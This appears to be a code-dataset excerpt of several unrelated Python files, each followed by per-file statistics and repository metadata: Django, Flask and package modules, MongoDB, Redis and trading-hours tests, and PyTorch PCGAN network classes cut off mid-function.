from .get_agent import *
from .get_agent_images import *
from .get_agents import *
from .get_connection import *
from .get_connections import *
from .get_job import *
from .get_jobs import *
from .get_migration import *
from .get_migrations import *
from .job import *
from .migration import *
from ._inputs import *
from . import outputs
| 28.478261
| 87
| 0.748092
| 97
| 655
| 4.927835
| 0.505155
| 0.292887
| 0.24477
| 0.096234
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.001828
| 0.164886
| 655
| 22
| 88
| 29.772727
| 0.872029
| 0.334351
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
0fd5c56cd903aae7873d205163b2967ae3164fb9
| 197
|
py
|
Python
|
django_spaceless_templates/loaders/app_directories.py
|
martinsvoboda/django-spaceless-templates
|
e671af3ee04414066306e4205e46fb8bd792f787
|
[
"MIT"
] | 2
|
2021-06-19T20:59:43.000Z
|
2021-08-17T23:16:26.000Z
|
django_spaceless_templates/loaders/app_directories.py
|
martinsvoboda/django-template-minifying-loader
|
e671af3ee04414066306e4205e46fb8bd792f787
|
[
"MIT"
] | null | null | null |
django_spaceless_templates/loaders/app_directories.py
|
martinsvoboda/django-template-minifying-loader
|
e671af3ee04414066306e4205e46fb8bd792f787
|
[
"MIT"
] | null | null | null |
from django.template.loaders.app_directories import Loader as AppDirectoriesLoader
from ..mixins import TemplateMinifierMixin
class Loader(TemplateMinifierMixin, AppDirectoriesLoader):
pass
| 24.625
| 82
| 0.847716
| 19
| 197
| 8.736842
| 0.736842
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.106599
| 197
| 7
| 83
| 28.142857
| 0.943182
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0.25
| 0.5
| 0
| 0.75
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 1
| 0
|
0
| 6
|
e8c744a8a1cc0f5ddf20aed871ea98d1a5b7c5d8
| 8,760
|
py
|
Python
|
test_case/test_config_base_utils.py
|
mmmaaaggg/QABAT
|
d6f20d926de047af6857e466cf28084d0ba69993
|
[
"MIT"
] | 3
|
2019-08-31T18:01:10.000Z
|
2021-04-04T09:51:17.000Z
|
test_case/test_config_base_utils.py
|
mmmaaaggg/QABAT
|
d6f20d926de047af6857e466cf28084d0ba69993
|
[
"MIT"
] | null | null | null |
test_case/test_config_base_utils.py
|
mmmaaaggg/QABAT
|
d6f20d926de047af6857e466cf28084d0ba69993
|
[
"MIT"
] | 1
|
2020-08-15T17:04:14.000Z
|
2020-08-15T17:04:14.000Z
|
# -*- coding: utf-8 -*-
"""
Created on 2017/6/24
@author: MG
"""
import logging
import unittest
from config import Config, with_mongo_collection
from collections import OrderedDict
from pymongo.errors import DuplicateKeyError
import time
from datetime import datetime, timedelta
logger = logging.getLogger()
class MongoTest(unittest.TestCase):
"""
config.py 的自动化测试案例
"""
def test_deal_with_mongo_collection(self):
"""
mongodb 连续插入重复数据会报错,原因不详
:return:
"""
odic = OrderedDict()
odic['abc'] = 123
odic['defg'] = 4567
odic['xyz'] = 980
odic['fhg'] = 456
print(odic)
collection_name = 'Hello'
with self.assertRaises(DuplicateKeyError):
for n in range(2):
time.sleep(2)
with_mongo_collection(lambda col: col.insert_one(odic), collection_name)
with_mongo_collection(lambda col: col.delete_many(), collection_name)
def test_deal_with_mongo_collection(self):
"""
插入mongodb中记录字段的顺序,无关,都可以被find出来
:return:
"""
dic_list = [
OrderedDict([('abc', 123), ('defg', 4567), ('xyz', 980), ('fhg', 456), ('n', 0)]),
OrderedDict([('defg', 4567), ('abc', 123), ('xyz', 980), ('fhg', 456), ('n', 1)]),
OrderedDict([('xyz', 980), ('abc', 123), ('defg', 4567), ('fhg', 456), ('n', 2)]),
OrderedDict([('fhg', 456), ('abc', 123), ('defg', 4567), ('xyz', 980), ('n', 3)]),
OrderedDict([('n', 4), ('abc', 123), ('defg', 4567), ('xyz', 980), ('fhg', 456)]),
]
for odic in dic_list:
print(odic)
collection_name = 'Hello'
with_mongo_collection(lambda c:
c.delete_many({'abc': 123}), collection_name)
with_mongo_collection(lambda col: col.insert_many(dic_list), collection_name)
def check(col):
"""
检查collection是否存在相应记录,顺序是否匹配
:param col:
:return:
"""
for n, raw in enumerate(col.find({'abc': 123})):
print(n, raw)
self.assertEqual(raw['n'], n)
with_mongo_collection(check, collection_name)
with_mongo_collection(lambda c:
c.delete_many({'abc': 123}), collection_name)
class RedisTest(unittest.TestCase):
"""
config redis test
"""
def test_redis(self):
r = Config.get_redis()
r.set('key1', 'hello world')
self.assertEqual(r.get('key1'), b'hello world')
r.delete('key1')
self.assertFalse(r.exists('key1'))
self.assertIsNone(r.get('key1'))
class THoursTest(unittest.TestCase):
"""
测试 structed_thours(thours_str, target_date=None)
"""
def test_if(self):
instrument_id = 'if1712'
datetime_range_list_result = Config.get_trade_datetime_range_list(instrument_id)
datetime_now = datetime.now()
datetime_next_day = datetime_now + timedelta(days=1)
datetime_range_list_target = [
(datetime(datetime_now.year, datetime_now.month, datetime_now.day, 9, 30),
datetime(datetime_now.year, datetime_now.month, datetime_now.day, 11, 30)),
(datetime(datetime_now.year, datetime_now.month, datetime_now.day, 13, 0),
datetime(datetime_now.year, datetime_now.month, datetime_now.day, 15)),
]
self.assertEqual(datetime_range_list_result, datetime_range_list_target)
def test_tf(self):
instrument_id = 'tf1712'
datetime_range_list_result = Config.get_trade_datetime_range_list(instrument_id)
datetime_now = datetime.now()
datetime_next_day = datetime_now + timedelta(days=1)
datetime_range_list_target = [
(datetime(datetime_now.year, datetime_now.month, datetime_now.day, 9, 15),
datetime(datetime_now.year, datetime_now.month, datetime_now.day, 11, 30)),
(datetime(datetime_now.year, datetime_now.month, datetime_now.day, 13, 0),
datetime(datetime_now.year, datetime_now.month, datetime_now.day, 15, 15)),
]
self.assertEqual(datetime_range_list_result, datetime_range_list_target)
def test_rb(self):
instrument_id = 'rb1712'
datetime_range_list_result = Config.get_trade_datetime_range_list(instrument_id)
datetime_now = datetime.now()
datetime_next_day = datetime_now + timedelta(days=1)
datetime_range_list_target = [
(datetime(datetime_now.year, datetime_now.month, datetime_now.day, 9, 0),
datetime(datetime_now.year, datetime_now.month, datetime_now.day, 10, 15)),
(datetime(datetime_now.year, datetime_now.month, datetime_now.day, 10, 30),
datetime(datetime_now.year, datetime_now.month, datetime_now.day, 11, 30)),
(datetime(datetime_now.year, datetime_now.month, datetime_now.day, 13, 30),
datetime(datetime_now.year, datetime_now.month, datetime_now.day, 15, 0)),
(datetime(datetime_now.year, datetime_now.month, datetime_now.day, 21, 0),
datetime(datetime_now.year, datetime_now.month, datetime_now.day, 23, 0)),
]
self.assertEqual(datetime_range_list_result, datetime_range_list_target)
def test_au(self):
instrument_id = 'au1712'
datetime_range_list_result = Config.get_trade_datetime_range_list(instrument_id)
datetime_now = datetime.now()
datetime_next_day = datetime_now + timedelta(days=1)
datetime_range_list_target = [
(datetime(datetime_now.year, datetime_now.month, datetime_now.day, 9, 0),
datetime(datetime_now.year, datetime_now.month, datetime_now.day, 10, 15)),
(datetime(datetime_now.year, datetime_now.month, datetime_now.day, 10, 30),
datetime(datetime_now.year, datetime_now.month, datetime_now.day, 11, 30)),
(datetime(datetime_now.year, datetime_now.month, datetime_now.day, 13, 30),
datetime(datetime_now.year, datetime_now.month, datetime_now.day, 15, 0)),
(datetime(datetime_now.year, datetime_now.month, datetime_now.day, 21, 0),
datetime(datetime_now.year, datetime_now.month, datetime_now.day, 2, 30) + timedelta(days=1)),
]
self.assertEqual(datetime_range_list_result, datetime_range_list_target)
def test_cu(self):
instrument_id = 'cu1712'
datetime_range_list_result = Config.get_trade_datetime_range_list(instrument_id)
datetime_now = datetime.now()
datetime_next_day = datetime_now + timedelta(days=1)
datetime_range_list_target = [
(datetime(datetime_now.year, datetime_now.month, datetime_now.day, 9, 0),
datetime(datetime_now.year, datetime_now.month, datetime_now.day, 10, 15)),
(datetime(datetime_now.year, datetime_now.month, datetime_now.day, 10, 30),
datetime(datetime_now.year, datetime_now.month, datetime_now.day, 11, 30)),
(datetime(datetime_now.year, datetime_now.month, datetime_now.day, 13, 30),
datetime(datetime_now.year, datetime_now.month, datetime_now.day, 15, 0)),
(datetime(datetime_now.year, datetime_now.month, datetime_now.day, 21, 0),
datetime(datetime_now.year, datetime_now.month, datetime_now.day, 1, 0) + timedelta(days=1)),
]
self.assertEqual(datetime_range_list_result, datetime_range_list_target)
def test_cf(self):
instrument_id = 'cf1712'
datetime_range_list_result = Config.get_trade_datetime_range_list(instrument_id)
datetime_now = datetime.now()
datetime_next_day = datetime_now + timedelta(days=1)
datetime_range_list_target = [
(datetime(datetime_now.year, datetime_now.month, datetime_now.day, 9, 0),
datetime(datetime_now.year, datetime_now.month, datetime_now.day, 10, 15)),
(datetime(datetime_now.year, datetime_now.month, datetime_now.day, 10, 30),
datetime(datetime_now.year, datetime_now.month, datetime_now.day, 11, 30)),
(datetime(datetime_now.year, datetime_now.month, datetime_now.day, 13, 30),
datetime(datetime_now.year, datetime_now.month, datetime_now.day, 15, 0)),
(datetime(datetime_now.year, datetime_now.month, datetime_now.day, 21, 0),
datetime(datetime_now.year, datetime_now.month, datetime_now.day, 23, 30) + timedelta(days=1)),
]
self.assertEqual(datetime_range_list_result, datetime_range_list_target)
if __name__ == '__main__':
logging.basicConfig(level=logging.DEBUG, format=Config.LOG_FORMAT)
unittest.main()
| 44.923077
| 108
| 0.644635
| 1,080
| 8,760
| 4.941667
| 0.128704
| 0.284429
| 0.142402
| 0.172381
| 0.760727
| 0.758104
| 0.740491
| 0.719693
| 0.695709
| 0.695709
| 0
| 0.040865
| 0.234589
| 8,760
| 194
| 109
| 45.154639
| 0.755108
| 0.030479
| 0
| 0.503497
| 0
| 0
| 0.02273
| 0
| 0
| 0
| 0
| 0
| 0.076923
| 1
| 0.06993
| false
| 0
| 0.048951
| 0
| 0.13986
| 0.020979
| 0
| 0
| 0
| null | 1
| 0
| 1
| 0
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
fa068157d212152a538c6517014a53fc52c463c6
| 185
|
py
|
Python
|
wrappers/python/tests/indy.py
|
absltkaos/indy-sdk
|
bc14c5b514dc1c76ce62dd7f6bf804120bf69f5e
|
[
"Apache-2.0"
] | 636
|
2017-05-25T07:45:43.000Z
|
2022-03-23T22:30:34.000Z
|
wrappers/python/tests/indy.py
|
Nick-1979/indy-sdk
|
e5f812e14962f0d51cf96f843033754ff841ce30
|
[
"Apache-2.0"
] | 731
|
2017-05-29T07:15:08.000Z
|
2022-03-31T07:55:58.000Z
|
wrappers/python/tests/indy.py
|
Nick-1979/indy-sdk
|
e5f812e14962f0d51cf96f843033754ff841ce30
|
[
"Apache-2.0"
] | 904
|
2017-05-25T07:45:49.000Z
|
2022-03-31T07:43:31.000Z
|
import pytest
from indy import libindy
# noinspection PyUnusedLocal
@pytest.mark.sync
def test_set_runtime_config():
libindy.set_runtime_config('{"crypto_thread_pool_size": 2}')
| 18.5
| 64
| 0.794595
| 25
| 185
| 5.56
| 0.76
| 0.143885
| 0.230216
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.006098
| 0.113514
| 185
| 9
| 65
| 20.555556
| 0.841463
| 0.140541
| 0
| 0
| 0
| 0
| 0.191083
| 0.171975
| 0
| 0
| 0
| 0
| 0
| 1
| 0.2
| true
| 0
| 0.4
| 0
| 0.6
| 0
| 1
| 0
| 0
| null | 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
fa2ca1a8124da9945cc26a433ffd97d8d5b2edb4
| 152
|
py
|
Python
|
PyFiSync/__init__.py
|
AsocForDipStudiesAndTraining/PyFiSync
|
0aca30c75d4569e753dcc0d5e0653ec9116b7499
|
[
"MIT"
] | null | null | null |
PyFiSync/__init__.py
|
AsocForDipStudiesAndTraining/PyFiSync
|
0aca30c75d4569e753dcc0d5e0653ec9116b7499
|
[
"MIT"
] | null | null | null |
PyFiSync/__init__.py
|
AsocForDipStudiesAndTraining/PyFiSync
|
0aca30c75d4569e753dcc0d5e0653ec9116b7499
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import sys
sys.dont_write_bytecode = True
from .main import __version__,__author__
from .main import cli
| 21.714286
| 41
| 0.736842
| 23
| 152
| 4.434783
| 0.782609
| 0.156863
| 0.27451
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.007634
| 0.138158
| 152
| 6
| 42
| 25.333333
| 0.770992
| 0.276316
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.75
| 0
| 0.75
| 0
| 1
| 0
| 0
| null | 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
fa7220ea2fc15337fd98c0a6664709c4ab499a29
| 936
|
py
|
Python
|
x_rebirth_station_calculator/station_data/ol__mega_tank_farm.py
|
Phipsz/XRebirthStationCalculator
|
ac31c2f5816be34a7df2d7c4eb4bd5e01f7ff835
|
[
"MIT"
] | 1
|
2016-04-17T11:00:22.000Z
|
2016-04-17T11:00:22.000Z
|
x_rebirth_station_calculator/station_data/ol__mega_tank_farm.py
|
Phipsz/XRebirthStationCalculator
|
ac31c2f5816be34a7df2d7c4eb4bd5e01f7ff835
|
[
"MIT"
] | null | null | null |
x_rebirth_station_calculator/station_data/ol__mega_tank_farm.py
|
Phipsz/XRebirthStationCalculator
|
ac31c2f5816be34a7df2d7c4eb4bd5e01f7ff835
|
[
"MIT"
] | null | null | null |
from x_rebirth_station_calculator.station_data import modules
from x_rebirth_station_calculator.station_data.station_base import Station
names = {'L044': 'Mega-Tank Farm',
'L049': 'Megaaquarium-Farm'}
smodules = [modules.SpiceTubes(efficiency=159),
modules.SpiceTubes(efficiency=159),
modules.PlanktonTank(production_method='ar', efficiency=160),
modules.PlanktonTank(production_method='ar', efficiency=160),
modules.PlanktonTank(production_method='ar', efficiency=160),
modules.PlanktonTank(production_method='ar', efficiency=160),
modules.SoyBeanery(production_method='ar', efficiency=178),
modules.SoyBeanery(production_method='ar', efficiency=178),
modules.SoyBeanery(production_method='ar', efficiency=178),
modules.SoyBeanery(production_method='ar', efficiency=178)]
OL_MegaTankFarm = Station(names, smodules)
| 49.263158
| 74
| 0.715812
| 98
| 936
| 6.653061
| 0.295918
| 0.196319
| 0.220859
| 0.343558
| 0.815951
| 0.723926
| 0.723926
| 0.601227
| 0.601227
| 0.601227
| 0
| 0.046332
| 0.169872
| 936
| 18
| 75
| 52
| 0.792793
| 0
| 0
| 0.466667
| 0
| 0
| 0.058761
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.133333
| 0
| 0.133333
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
d70ddb07be6c5060dc8e08bd6bb710b00060cead
| 97
|
py
|
Python
|
app/api/__init__.py
|
JungWinter/chef-hong
|
ffa0625c979e8380f8eead020af697f35ea4c823
|
[
"MIT"
] | 3
|
2018-06-30T22:29:02.000Z
|
2020-04-12T06:13:52.000Z
|
app/api/__init__.py
|
JungWinter/chef-hong
|
ffa0625c979e8380f8eead020af697f35ea4c823
|
[
"MIT"
] | 4
|
2021-01-10T13:27:02.000Z
|
2021-03-21T05:19:10.000Z
|
app/api/__init__.py
|
JungWinter/chef-hong
|
ffa0625c979e8380f8eead020af697f35ea4c823
|
[
"MIT"
] | null | null | null |
from flask import Blueprint
api = Blueprint('api', __name__)
from app.api import views # noqa
| 16.166667
| 33
| 0.742268
| 14
| 97
| 4.857143
| 0.642857
| 0.352941
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.175258
| 97
| 5
| 34
| 19.4
| 0.85
| 0.041237
| 0
| 0
| 0
| 0
| 0.032967
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.666667
| 0
| 0.666667
| 0.666667
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 1
|
0
| 6
|
d768da4587b257e154c21891ddfb30a1f7875dec
| 75
|
py
|
Python
|
implierWorkspace/Implier/src/runConsolidate.py
|
benofben/implier
|
ad1352c9272a20cf15a3552521b0d08ba9fbcc23
|
[
"MIT"
] | null | null | null |
implierWorkspace/Implier/src/runConsolidate.py
|
benofben/implier
|
ad1352c9272a20cf15a3552521b0d08ba9fbcc23
|
[
"MIT"
] | null | null | null |
implierWorkspace/Implier/src/runConsolidate.py
|
benofben/implier
|
ad1352c9272a20cf15a3552521b0d08ba9fbcc23
|
[
"MIT"
] | null | null | null |
import preprocessor.consolidate
preprocessor.consolidate.consolidateDays()
| 37.5
| 42
| 0.893333
| 6
| 75
| 11.166667
| 0.666667
| 0.686567
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.04
| 75
| 2
| 42
| 37.5
| 0.930556
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.5
| 0
| 0.5
| 0
| 1
| 0
| 1
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 6
|
d772bb7f7cc2b98ab0d6d324efb5fa08cf0133f8
| 192
|
py
|
Python
|
tests/test-recipes/test-package/bin/test-script-setup.py
|
DerThorsten/conda-build
|
729c0cea03677dae0e2e15b7ec6d98619b5d4401
|
[
"BSD-3-Clause"
] | 5
|
2016-05-10T23:36:56.000Z
|
2021-04-21T17:09:18.000Z
|
tests/test-recipes/test-package/bin/test-script-setup.py
|
DerThorsten/conda-build
|
729c0cea03677dae0e2e15b7ec6d98619b5d4401
|
[
"BSD-3-Clause"
] | 6
|
2016-07-05T19:08:39.000Z
|
2017-10-23T10:59:14.000Z
|
tests/test-recipes/test-package/bin/test-script-setup.py
|
DerThorsten/conda-build
|
729c0cea03677dae0e2e15b7ec6d98619b5d4401
|
[
"BSD-3-Clause"
] | 5
|
2016-10-08T19:31:55.000Z
|
2021-10-10T18:24:42.000Z
|
#!/usr/bin/env python
import conda_build_test
conda_build_test
print("Test script setup.py")
if __name__ == "__main__":
from conda_build_test import manual_entry
manual_entry.main()
| 19.2
| 45
| 0.765625
| 29
| 192
| 4.517241
| 0.62069
| 0.229008
| 0.320611
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.140625
| 192
| 9
| 46
| 21.333333
| 0.793939
| 0.104167
| 0
| 0
| 0
| 0
| 0.163743
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.333333
| 0
| 0.333333
| 0.166667
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 6
|
d7829c816b65c7a6b4799388e22d4943997018e6
| 10,897
|
py
|
Python
|
ext_models/pcgan_model.py
|
rkansal47/MPGAN
|
8be23da97ece3d173e1a59defc45aa7a1112232d
|
[
"MIT"
] | 8
|
2021-08-29T11:52:45.000Z
|
2022-01-28T00:09:49.000Z
|
ext_models/pcgan_model.py
|
rkansal47/MPGAN
|
8be23da97ece3d173e1a59defc45aa7a1112232d
|
[
"MIT"
] | 1
|
2021-12-02T11:38:31.000Z
|
2021-12-08T22:44:57.000Z
|
ext_models/pcgan_model.py
|
rkansal47/MPGAN
|
8be23da97ece3d173e1a59defc45aa7a1112232d
|
[
"MIT"
] | null | null | null |
import torch.nn as nn
class PermEqui1_max(nn.Module):
def __init__(self, in_dim, out_dim):
super(PermEqui1_max, self).__init__()
self.Gamma = nn.Linear(in_dim, out_dim)
def forward(self, x):
xm, _ = x.max(1, keepdim=True)
x = self.Gamma(x - xm)
return x
class PermEqui2_max(nn.Module):
def __init__(self, in_dim, out_dim):
super(PermEqui2_max, self).__init__()
self.Gamma = nn.Linear(in_dim, out_dim)
self.Lambda = nn.Linear(in_dim, out_dim, bias=False)
def forward(self, x):
xm, _ = x.max(1, keepdim=True)
xm = self.Lambda(xm)
x = self.Gamma(x)
x = x - xm
return x
class PermEqui2_mean(nn.Module):
def __init__(self, in_dim, out_dim):
super(PermEqui2_mean, self).__init__()
self.Gamma = nn.Linear(in_dim, out_dim)
self.Lambda = nn.Linear(in_dim, out_dim, bias=False)
def forward(self, x):
xm = x.mean(1, keepdim=True)
xm = self.Lambda(xm)
x = self.Gamma(x)
x = x - xm
return x
class G_inv_Tanh(nn.Module):
def __init__(self, x_dim, d_dim, z1_dim, pool="mean"):
super(G_inv_Tanh, self).__init__()
self.d_dim = d_dim
self.x_dim = x_dim
self.z1_dim = z1_dim
self.pool = pool
if pool == "max":
self.phi = nn.Sequential(
PermEqui2_max(self.x_dim, self.d_dim),
nn.Tanh(),
PermEqui2_max(self.d_dim, self.d_dim),
nn.Tanh(),
PermEqui2_max(self.d_dim, self.d_dim),
nn.Tanh(),
)
elif pool == "max1":
self.phi = nn.Sequential(
PermEqui1_max(self.x_dim, self.d_dim),
nn.Tanh(),
PermEqui1_max(self.d_dim, self.d_dim),
nn.Tanh(),
PermEqui1_max(self.d_dim, self.d_dim),
nn.Tanh(),
)
elif pool == "mean":
self.phi = nn.Sequential(
PermEqui2_mean(self.x_dim, self.d_dim),
nn.Tanh(),
PermEqui2_mean(self.d_dim, self.d_dim),
nn.Tanh(),
PermEqui2_mean(self.d_dim, self.d_dim),
nn.Tanh(),
)
self.ro = nn.Sequential(
nn.Linear(self.d_dim, self.d_dim),
nn.Tanh(),
nn.Linear(self.d_dim, self.z1_dim),
)
print(self)
self.faster_parameters = [p for p in self.parameters()]
def forward(self, x):
phi_output = self.phi(x)
sum_output, _ = phi_output.max(1)
ro_output = self.ro(sum_output)
return ro_output
class G_inv(nn.Module):
def __init__(self, x_dim, d_dim, z1_dim, pool="mean"):
super(G_inv, self).__init__()
self.d_dim = d_dim
self.x_dim = x_dim
self.z1_dim = z1_dim
self.pool = pool
if pool == "max":
self.phi = nn.Sequential(
PermEqui2_max(self.x_dim, self.d_dim),
nn.Softplus(),
PermEqui2_max(self.d_dim, self.d_dim),
nn.Softplus(),
PermEqui2_max(self.d_dim, self.d_dim),
nn.Softplus(),
)
elif pool == "max1":
self.phi = nn.Sequential(
PermEqui1_max(self.x_dim, self.d_dim),
nn.Softplus(),
PermEqui1_max(self.d_dim, self.d_dim),
nn.Softplus(),
PermEqui1_max(self.d_dim, self.d_dim),
nn.Softplus(),
)
elif pool == "mean":
self.phi = nn.Sequential(
PermEqui2_mean(self.x_dim, self.d_dim),
nn.Softplus(),
PermEqui2_mean(self.d_dim, self.d_dim),
nn.Softplus(),
PermEqui2_mean(self.d_dim, self.d_dim),
nn.Softplus(),
)
self.ro = nn.Sequential(
nn.Linear(self.d_dim, self.d_dim),
nn.Softplus(),
nn.Linear(self.d_dim, self.z1_dim),
)
print(self)
self.faster_parameters = [p for p in self.parameters()]
def forward(self, x):
phi_output = self.phi(x)
sum_output, _ = phi_output.max(1)
ro_output = self.ro(sum_output)
return ro_output
class D(nn.Module):
def __init__(self, x_dim, z1_dim, d_dim, o_dim=1):
super(D, self).__init__()
self.d_dim = d_dim
self.x_dim = x_dim
self.z1_dim = z1_dim
self.fc = nn.Linear(self.z1_dim, self.d_dim)
self.fu = nn.Linear(self.x_dim, self.d_dim, bias=False)
self.f = nn.Sequential(
nn.Softplus(),
nn.Linear(self.d_dim, self.d_dim),
nn.Softplus(),
nn.Linear(self.d_dim, self.d_dim),
nn.Softplus(),
nn.Linear(self.d_dim, self.d_dim),
nn.Softplus(),
nn.Linear(self.d_dim, o_dim),
)
print(self)
self.faster_parameters = [p for p in self.parameters()]
def forward(self, x, z1):
y = self.fc(z1) + self.fu(x)
return self.f(y)
class skipD(nn.Module):
def __init__(self, x_dim, z1_dim, d_dim, o_dim=1):
super(skipD, self).__init__()
self.d_dim = d_dim
self.x_dim = x_dim
self.z1_dim = z1_dim
# hid_d = 5*(z1_dim+z2_dim)
hid_d = max(1024, 2 * z1_dim)
self.fc = nn.Linear(self.z1_dim, hid_d)
self.fu = nn.Linear(self.x_dim, hid_d, bias=False)
self.part1 = nn.Sequential(
nn.Softplus(),
nn.Linear(hid_d, hid_d),
nn.Softplus(),
nn.Linear(hid_d, hid_d - self.z1_dim),
)
self.sc = nn.Linear(self.z1_dim, hid_d)
self.su = nn.Linear(hid_d - self.z1_dim, hid_d, bias=False)
self.part2 = nn.Sequential(
nn.Softplus(),
nn.Linear(hid_d, hid_d),
nn.Softplus(),
nn.Linear(hid_d, hid_d - self.z1_dim),
)
self.tc = nn.Linear(self.z1_dim, hid_d)
self.tu = nn.Linear(hid_d - self.z1_dim, hid_d, bias=False)
self.part3 = nn.Sequential(
nn.Softplus(), nn.Linear(hid_d, hid_d), nn.Softplus(), nn.Linear(hid_d, o_dim)
)
print(self)
self.faster_parameters = [p for p in self.parameters()]
def forward(self, x, z1):
y = self.fc(z1) + self.fu(x)
output = self.part1(y)
y2 = self.sc(z1) + self.su(output)
output1 = self.part2(y2)
y3 = self.tc(z1) + self.tu(output1)
output2 = self.part3(y3)
return output2
class G(nn.Module):
def __init__(self, x_dim, z1_dim, z2_dim):
super(G, self).__init__()
self.z1_dim = z1_dim
self.z2_dim = z2_dim
self.x_dim = x_dim
hid_d = max(250, 2 * z1_dim)
# hid_d = z1_dim+z2_dim
self.fc = nn.Linear(self.z1_dim, hid_d)
self.fu = nn.Linear(self.z2_dim, hid_d, bias=False)
self.main = nn.Sequential(
nn.Softplus(),
nn.Linear(hid_d, hid_d),
nn.Softplus(),
nn.Linear(hid_d, hid_d),
nn.Softplus(),
nn.Linear(hid_d, hid_d),
nn.Softplus(),
nn.Linear(hid_d, hid_d),
nn.Softplus(),
nn.Linear(hid_d, self.x_dim),
)
print(self)
self.faster_parameters = [p for p in self.parameters()]
def forward(self, z1, z2):
x = self.fc(z1) + self.fu(z2)
output = self.main(x)
return output
class skipG(nn.Module):
def __init__(self, x_dim, z1_dim, z2_dim):
super(skipG, self).__init__()
self.z1_dim = z1_dim
self.z2_dim = z2_dim
self.x_dim = x_dim
# hid_d = 5*(z1_dim+z2_dim)
hid_d = 250
self.fc = nn.Linear(self.z1_dim, hid_d)
self.fu = nn.Linear(self.z2_dim, hid_d, bias=False)
self.part1 = nn.Sequential(
nn.Softplus(),
nn.Linear(hid_d, hid_d),
nn.Softplus(),
nn.Linear(hid_d, z2_dim),
)
self.sc = nn.Linear(self.z1_dim, hid_d)
self.su = nn.Linear(self.z2_dim, hid_d, bias=False)
self.part2 = nn.Sequential(
nn.Softplus(), nn.Linear(hid_d, hid_d), nn.Softplus(), nn.Linear(hid_d, x_dim)
)
print(self)
self.faster_parameters = [p for p in self.parameters()]
def forward(self, z1, z2):
x = self.fc(z1) + self.fu(z2)
output = self.part1(x)
x1 = self.sc(z1) + self.su(output)
output1 = self.part2(x1)
return output1
class ALPHA(nn.Module):
def __init__(self, z1_dim):
super(ALPHA, self).__init__()
self.z1_dim = z1_dim
hid_d = min(z1_dim + 50, 100)
# hid_d = z1_dim+z2_dim
self.main = nn.Sequential(
nn.Linear(self.z1_dim, hid_d),
nn.Softplus(),
nn.Linear(hid_d, hid_d),
nn.Softplus(),
nn.Linear(hid_d, hid_d),
nn.Softplus(),
nn.Linear(hid_d, hid_d),
nn.Softplus(),
nn.Linear(hid_d, 1),
)
print(self)
self.faster_parameters = [p for p in self.parameters()]
def forward(self, x):
output = self.main(x)
return output
def zero_weights_init(m):
if isinstance(m, nn.Linear):
